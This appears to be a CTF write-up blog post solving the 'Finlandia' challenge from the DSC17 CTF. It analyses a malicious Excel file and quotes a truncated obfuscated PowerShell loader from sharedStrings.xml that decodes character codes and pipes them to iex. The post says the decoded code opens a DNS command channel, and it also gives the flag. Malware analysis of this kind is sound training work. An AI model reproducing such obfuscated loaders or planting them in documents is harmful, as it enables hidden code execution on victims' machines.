Hi mates,

During my spare time i have tried some tasks from DSC17 CTF by S21sec. I will comment here on those in which I found more difficult or fun. FBCTF was present as platform so from here tasks names will be countries associated.

Finlandia – 400 points 

I have an Excel suspicious file as title says and first thing is uncompress or extract contents. So use binwalk, rename as zip or whatever. Inside we have a vba bin file. We can use oledump.py to view its contents.

After some time trying to decompress and decode vba bin file , seems no exit so i ‘ve start to search for other files. I have see one in particular. sharedStrings.xml :

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('83G116G97B114E1...[]...C112B116B98B108C111H99H107C32G123H1'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>

So, this is powershell obfuscated code, let’s try to see it’s contents.

It creates a DNS client to pass commands on powershell.  Flag is «f25a2fc72690b780b2a14e140ef6a9e0»